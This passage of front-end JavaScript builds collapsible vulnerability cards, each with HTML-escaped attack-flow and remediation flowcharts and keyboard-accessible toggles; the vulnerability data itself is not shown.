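 * @param {unknown} value  Value to render; coerced with String().
 * @returns {string} Text safe to place inside an HTML text node or a quoted attribute.
 */
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

/**
 * Render one flowchart step (node + connector + content box) as an HTML string.
 *
 * @param {{type:string,title:string,desc:string,tools?:string[],code?:string}} step
 * @param {boolean} isLast  When true the vertical connector below the node is omitted.
 * @returns {string} HTML for a `.flow-step` element.
 */
function renderStep(step, isLast) {
  const toolsHtml = step.tools
    ? `<div style="margin-top:6px">${step.tools.map(t => `<span class="tool-tag">${escapeHtml(t)}</span>`).join('')}</div>`
    : '';
  // Escape first, then convert newlines to <br>, so the <br> survives but nothing in the
  // code sample is ever parsed as markup.
  const codeHtml = step.code
    ? `<div style="margin-top:6px"><code>${escapeHtml(step.code).replace(/\n/g, '<br>')}</code></div>`
    : '';
  return `
<div class="flow-step step-${escapeHtml(step.type)}">
<div class="flow-line">
<div class="flow-node">${stepIcons[step.type]}</div>
${!isLast ? '<div class="flow-connector"></div>' : ''}
</div>
<div class="flow-content">
<h4>${stepLabels[step.type]}: ${escapeHtml(step.title)}</h4>
<p>${escapeHtml(step.desc)}</p>
${toolsHtml}
${codeHtml}
</div>
</div>`;
}

/**
 * Build one collapsible vulnerability card: a clickable header (id badge, title,
 * CVE/CWE reference, severity badge, chevron) and a hidden body holding the
 * attack-flow and remediation flowcharts.
 *
 * The header is keyboard-operable (Tab to focus, Enter/Space to toggle) and
 * exposes its open/closed state through aria-expanded.
 *
 * @param {{id:string,title:string,cve:string,sev:string,steps:object[]}} vuln
 *   One entry of the `vulns` array; `sev` selects the `.num-*` / `.sev-*` CSS classes.
 * @returns {HTMLDivElement} The `.vuln-card` element, not yet attached to the document.
 */
function buildCard(vuln) {
  const card = document.createElement('div');
  card.className = 'vuln-card';

  // Header — acts as the disclosure control for the body.
  const header = document.createElement('div');
  header.className = 'card-header';
  header.style.background = `linear-gradient(135deg, #111120, #1a1a30)`;
  header.style.borderBottom = '1px solid #222240';
  header.setAttribute('role', 'button');
  header.setAttribute('tabindex', '0');
  header.setAttribute('aria-expanded', 'false');
  const sev = escapeHtml(vuln.sev);
  // Colours come from the .num-* / .sev-* stylesheet classes (no duplicated inline style).
  header.innerHTML = `
<div class="num num-${sev}">${escapeHtml(vuln.id)}</div>
<div class="title-block">
<h3>${escapeHtml(vuln.title)}</h3>
<div class="cve">${escapeHtml(vuln.cve)}</div>
</div>
<div class="sev-badge sev-${sev}">${escapeHtml(String(vuln.sev).toUpperCase())}</div>
<div class="toggle-icon" aria-hidden="true">▼</div>
`;

  // Body — attack flow first, then remediation, each under its own divider.
  const body = document.createElement('div');
  body.className = 'card-body';
  const attackSteps = vuln.steps.filter(s => ['recon', 'attack', 'exploit', 'impact'].includes(s.type));
  const fixSteps = vuln.steps.filter(s => ['fix', 'test'].includes(s.type));
  let flowHTML = '<div class="flowchart">';
  flowHTML += `<div class="divider divider-attack"><div class="divider-line"></div><div class="divider-label">⚔ ATTACK FLOW</div><div class="divider-line"></div></div>`;
  flowHTML += attackSteps.map((step, i) => renderStep(step, i === attackSteps.length - 1)).join('');
  flowHTML += `<div class="divider divider-fix"><div class="divider-line"></div><div class="divider-label">🛡 REMEDIATION</div><div class="divider-line"></div></div>`;
  flowHTML += fixSteps.map((step, i) => renderStep(step, i === fixSteps.length - 1)).join('');
  flowHTML += '</div>';
  body.innerHTML = flowHTML;

  // Toggle open/closed state, keeping the chevron and aria-expanded in sync.
  const toggle = () => {
    const open = !body.classList.contains('open');
    body.classList.toggle('open', open);
    header.querySelector('.toggle-icon').classList.toggle('open', open);
    header.setAttribute('aria-expanded', String(open));
  };
  header.addEventListener('click', toggle);
  header.addEventListener('keydown', (e) => {
    if (e.key === 'Enter' || e.key === ' ') {
      e.preventDefault(); // stop Space from scrolling the page
      toggle();
    }
  });

  card.appendChild(header);
  card.appendChild(body);
  return card;
}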
// Mount point declared in the markup; one card is appended per vulnerability, in order.
const grid = document.getElementById('vulnGrid');
for (const vuln of vulns) {
  grid.appendChild(buildCard(vuln));
}
</script>
</body>
</html>